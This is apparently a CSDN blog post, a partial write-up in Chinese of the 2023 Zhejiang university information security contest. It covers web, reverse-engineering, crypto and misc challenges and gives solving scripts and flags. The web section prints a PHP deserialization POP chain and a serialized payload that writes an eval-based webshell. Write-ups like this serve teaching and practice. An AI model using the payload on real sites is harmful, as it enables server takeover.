2023浙江省大学生信息安全竞赛初赛 部分wp

最新推荐文章于 2024-06-05 10:47:47 发布
最新推荐文章于 2024-06-05 10:47:47 发布
阅读量1.1k 收藏 6
点赞数 2
文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35782055/article/details/134225477
版权

Web

easy php

BBB::__debuginfo() -> CCC::__toString() -> AAA::__call()

<?php
class AAA{
    public $cmd;

    public function __call($name, $arguments){
        eval($this->cmd);
        return "done";
    }
}

class BBB{
    public $param1;
    public function __construct($param1){
        $this->param1 = $param1;
    }
    public function __debuginfo(){
        return [
            'debugInfo' => 'param1' . $this->param1 
        ];
    }
}

class CCC{
    public $func;

    public function __toString(){
        var_dump("aaa");
        $this->func->aaa();
    }
}

if(isset($_GET['aaa'])){
    $aaa = $_GET['aaa'];
    var_dump(unserialize($aaa));
}


$C = new CCC();
$B = new BBB($C);
$A = new AAA();
$A ->cmd= "file_put_contents('shell.php','<?php eval(\$_POST[1]);?>');";
$C->func = $A; 

echo serialize($B);
# O:3:"BBB":1:{s:6:"param1";O:3:"CCC":1:{s:4:"func";O:3:"AAA":1:{s:3:"cmd";s:58:"file_put_contents('shell.php','<?php eval($_POST[1]);?>');";}}}

RE

pyccc

uncompyle6.exe 逆不出py

逆出如下文件image-20231104140256253

分析可知 先初始化一个数组 再对其内的每个元素异或其下标

c=[102,109,99,100,127,52,114,88,97,122,85,125,105,127,119,80,120,112,98,39,109,52,55,106]
# print(len(c))
tem = ""
for i in range(len(c)):
    tem += chr((c[i]) ^ i)
print(tem,end="")

image-20231104140349545

flag{1t_is_very_hap4y!!}

ezapk

反编译apk

image-20231104153119840

image-20231104153114211

解aes

image-20231104153136786

Crypto

小小数学家

re 匹配数字和符号进行运算

import re
num = re.compile("\d+")
symble = re.compile("\W")

with open("./flag.txt", "r")as f:
    lines = f.readlines()

    for line in lines:
        nums = (num.findall(line))
        symbles = (symble.findall(line))
        print(chr(int(eval(nums[0]+ symbles[0] + nums[1]))),end="")

image-20231104140435619

DASCTF{9d811301-281b-4f4a-8d1a-b38beccf2285}

基础数论

sage解p2 + q2 =n

import hashlib

c = 173178061442550241596295506150572803829268102881297542445649200353047297914764783385643705889370567071577408829104128703765633248277722687055281420899564198724968491216409225857070531370724352556864154450614891750313803499101686782558259953244119778256806332589612663957000269869144555485216828399422391672121
x,y = (two_squares(c))
print(x,y)
print(hashlib.md5(str(x+y).encode()).hexdigest())

image-20231104151117235

8ef20a4873c5ec776dd34bf5f0eb56cf

MISC

number game

后端就只有个js文件,可以发现roll这段代码很关键(因为题目说通过roll得到flag)

image-20231104164051987

将这段js复制处理,放入console,把if的判断条件改为true,然后再次点击roll,可以发现弹
flag了

image-20231104164058097

Ez_misc

拿到题目,根据jpg的文件头,可以发现每两位16进制是反的,那么我们只需要翻转就行了

image-20231104164116883

使用脚本进行反转

'''
A.bin
21.7.22
'''
input=open('C:/Users/Abin/Desktop/yuanshen','rb')
input_all = input.read()
ss =input_all[::-1]
output=open('C:/Users/Abin/Desktop/y.zip','wb')
output.write(ss)
input.close()
output.close()

反转之后的结果并不是正确的(因为是逆序的十六进制),我们还需要将整体的字符串反
转,这里我使用工具进行反转

image-20231104164158024

数据放入010中生成图片

image-20231104164209165

使用steghide进行解密,获得flag.txt

DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DASHDOTDASHDOT
DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DASHDOTDOTDOTDOT DASHDASHDOTDOTDOT
DASHDASHDOTDOTDOT DASHDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDOTDASH
DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH
DASHDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT
DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT
DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DASHDOTDOTDOTDOT
DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH
DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DOTDOTDASHDASHDASH
DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT
DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDASHDASH
DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH
DOTDOTDOTDASHDASH DASHDASHDASHDOTDOT DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT
DOTDOTDOTDASHDASH DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDASHDASHDASHDASH
DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DOTDOTDOTDASHDASH DASHDOTDOTDOTDOT
DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH DASHDOTDOTDOTDOT DOTDOTDOTDOTDASH
DOTDOTDOTDASHDASH DASHDASHDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH
DASHDOTDOTDOTDOT DOTDOTDASHDASHDASH DOTDOTDOTDASHDASH DOTDOTDOTDOTDASH
DASHDOTDOTDOTDOT DOTDOTDOTDOTDOT DASHDOTDOTDOTDOT DOTDOTDOTDASHDASH
DASHDASHDOTDOTDOT DASHDOTDOT

image-20231104164227594

根据摩斯密码的特征,及那个DASH转为-,DOT转为.,获得下面的代码

-… -… -… -.-. -… .---- -… --… --… -… -… …- -… -… …-- …- -… -… …-- -… …-- …-- …–
… -… .---- -… …— …-- …-- …-- …- …-- …— -… .---- …-- … -… …— …-- …-- -… …— -…
…— …-- —… …-- … …-- … -… .---- …-- …- …-- -… …-- …- -… …- …-- --… -… …— -…
…— …-- …- -… … -… …-- --… -…

image-20231104164246025

解得flag
flag{df4f635ab342a5b3bb855a464d7bb4ec}

丨Arcueid丨
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 8
    评论
全国大学生信息安全竞赛-初赛演示前端界面-demo.zip
11-09
信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考 信息安全竞赛相关程序代码、设计文档、使用说明,供参考
第六届浙江省大学生网络与信息安全竞赛-技能挑战部分WP
jjjj1029056414的博客
11-09 1238
第六届浙江省大学生网络与信息安全竞赛-技能挑战部分WP,整理复盘。
2023浙江省大学生信息与网络安全竞赛wp
superstudent2333的博客
11-06 706
很爽,今年给队内大爷带飞了,希望复也能躺。
2023浙江省大学生信息安全竞赛初赛misc方向wp
toto的博客
11-04 2054
但这样子恢复出来的图像有点问题卡了很久,后来发现有几个点原像素的频率值比背景(211,211,211)的频率还高。每个文字基本上RGB差不多,盲猜是把原图每个像素替换成一个文字了,测量后每个文字所在正方形为16*16。绝大多数情况下背景频率最高,原像素就是频率第二高的RGB值,直接选取sorted_dict[1]即可。简单读取一个16*16正方形的像素后发现由于图片压缩导致部分文字像素有渐进,同时可以看出背景像素为。得到的flag.txt很明显是摩斯,连变量名都对应好了,DASH替换为。
第五届浙江省网络与信息安全竞赛部分WP
hahaHalsey的博客
09-18 870
后续再补充
第五届浙江省大学生网络与信息安全竞赛 部分WP
weixin_46356548的博客
09-17 2127
第五届浙江省大学生网络与信息安全竞赛-技能挑战 部分WP
2022浙江省大学生信息安全竞赛技能初赛Writeup
toto的博客
09-19 2240
2022第五届浙江省信息安全技能初赛wp
家用厨房安全新篇章:煤气安全阀结构与校验知识普及
BDjiance的博客
06-03 299
煤气安全阀作为防止煤气泄露的关键设备,其结构特点、作用解析、定期校验的重要性以及泄露风险的防范等方面,都是我们必须深入了解和掌握的知识。例如,某地一家庭因煤气管道老化导致泄露,而安全阀因长期未校验而失效,最终引发爆炸事故,造成人员伤亡和财产损失。此外,在选择安全阀时,应确保其符合国家标准和产品质量要求,避免因使用劣质产品而带来的安全风险。首先,安全阀能够在煤气压力超过设定值时自动关闭,防止因压力过高导致的煤气泄露和爆炸事故。最后,在使用完煤气设备后,应确保关闭阀门并定期检查安全阀的工作状态。
语音控制系统的安全挑战与防御策略(下)
声纹感知 洞察芯声
05-29 1152
活性检测已成为VCS中一种普遍的防御策略,主要设计用来确定语音命令是否来自真实的人类。这种方法背后的基本前提是,大多数恶意命令都是机器生成的。这些命令通常通过扬声器播放或直接通过音频文件(如WAV文件)输入到VCS API中。与这些人工产生的命令不同,真正的人类用户不会以这种方式生成语音命令。因此,通过识别人类语音的特征,活性检测旨在过滤掉这些非人类、机器生成的输入,从而增强VCS的安全性。
Docker 安全及日志管理
2301_77081516的博客
06-02 654
虚拟机通过添加 Hypervisor 层,虚拟出网卡、内存、CPU 等虚拟硬件,再在其上建立虚拟机,每个虚拟机都有自己的系统内核。而 Docker 容器则是通过隔离的方式,将文件系统、 进程、设备、网络等资源进行隔离,再对权限、CPU 资源等进行控制,最终让容器之间互不影响,容器无法影响宿主机。容器与宿主机共享内核、文件系统、硬件等资源。
内网安全之证书模版的管理
weixin_45910629的博客
05-29 1205
证书模板 Certificate templates 是 CA 证书颁发机构的一个组成部分,是证书策略中的重要元素,是用于证书注册、使用和管理的一组规则和格式。当 CA 收到对证书的请求时,必须对该请求应用一组规则和设置,以执行所请求的功能,例如证书颁发或更新。这些规则可以是简单的,也可以是复杂的,也可以适用于所有用户或特定的用户组。证书模板是在 CA 上配置并应用于传入证书请求的一组规则和设置。证书模板还向客户机提供了关于如何创建和提交有效的证书请求的说明。基于证书模板的证书只能由企业 CA 颁发。
企业内网安全软件分享,有什么内网安全软件
域智盾软件的博客
06-04 452
当然,除了这些专业的内网安全软件外,还有一些免费的开源工具可供企业选择,如Zenoss、OSSIM、Spiceworks等。这款软件作为安全的网络世界理想推进者,以其强大的终端安全及边界准入、网络运维安全、数据安全等功能赢得了广大企业的信赖。通过对重要文件进行加密和对聊天软件、U盘等端口进行防泄密管理,系统能够有效地保护企业数据的安全,防止敏感信息的泄露。通过强大的终端行为监控能力,安企神系统能够记录和分析员工的电脑操作行为,有效识别潜在威胁,提高企业的工作效率。也是一款功能全面的内网安全软件。
水电站大坝安全监测工作详解
最新发布
yousino1的博客
06-05 190
监测人员需要定期对大坝的物理结构进行检查,包括但不限于大坝表面的裂缝、渗漏水位、混凝土和金属结构的状况。此外,现场监测还需要评估大坝周边的环境和水文情况,如水位、流速和沉积物等。这不仅包括物理数据的录入,也包括对数据的初步分析,如趋势分析、异常识别等。建立和维护一个包括人员管理、财务管理和技术管理在内的综合监测管理系统,可以保证监测工作的顺利进行。通过上述9项工作的细致执行,可以有效地监控和保障水电站大坝的安全运行。资料的归档不仅需要物理存储,也应采用数字化存储,确保信息的长期保存和易于检索。
安全漏洞扫描工具
weixin_45639224的博客
06-05 308
安全漏洞扫描工具
德人合科技——天锐绿盾内网安全管理软件 | -文档透明加密模块
m0_74448820的博客
05-30 878
重要的文档从生成即强制加密,强力守护信息资产。在授权环境中,文档能自动解密,不影响用户原有使用习惯;在非授权环境中,加密文档则无法正常打开和使用,严防文档泄露。在加密文档的使用过程中, 能够防止用户通过剪贴板、截屏、打印(虚拟打印)等方式窃取加密文档内容。
安全U盘和普通U盘有什么区别?
文件数据安全交换
06-03 717
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。安全U盘(也称为加密U盘或安全闪存驱动器)与普通U盘肯定是有一些区别的,从字面意思上来看,就能看出,安全U盘是能够保护文件数据安全性的,普通U盘没这一些功能的,可随意拷贝文件,不防盗,不防木马。
“网络战时代的国家安全:策略、技术和国际合作“
2403_84237550的博客
06-05 381
综上所述,网络战时代的国家安全策略必须是多维度、多层次的,既要注重内部能力的建设,也要加强外部合作,形成一个立体、动态的安全防护体系。这不仅是技术上的较量,更是策略智慧和国际合作能力的考验。1. 建立全面的网络战战略:国家需要一个清晰、前瞻性的网络战战略,既包括防御也涵盖进攻,同时要体现“积极防御”的理念,即在遭受攻击前便通过情报收集、漏洞管理等手段预判并阻止威胁。3. 强化跨部门协同:建立跨政府、军队、私营部门和民间的协作机制,确保信息共享、资源调配和快速响应,形成统一的网络防御阵线。
金融科技赋能跨境支付:便捷与安全并驾齐驱
易通智库
06-03 619
在全球经济一体化的背景下,跨境支付作为国际贸易和金融活动的重要组成部分,正迎来金融科技浪潮的洗礼。金融科技以其独特的创新性和颠覆性,正在重塑跨境支付市场的格局,使其更加便捷、高效且安全。本文旨在探讨金融科技如何助力跨境支付,实现便捷与安全并存,并通过丰富的案例及解决方案,展现其巨大的潜力和价值。
2023羊城杯密码wp
09-18
根据提供的引用内容,我们可以得出以下结论: 1. 引用给出了一个数学公式 C = A * M,其中 C包含flag的字符。 2. 引用提到了coppersmith算法,只要知道p的高位,就可以解密密码。 3. 引用介绍了一个函数corrupt(),它可以随机改变矩阵A中的元素,但有很大的可能性存在两行或更多的行没有发生变化。 根据提供的信息,我无法直接回答关于2023羊城杯密码的问题。因为这需要更多的上下文信息和算法知识。请您提供更多关于密码的相关信息,以便我可以帮助您解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值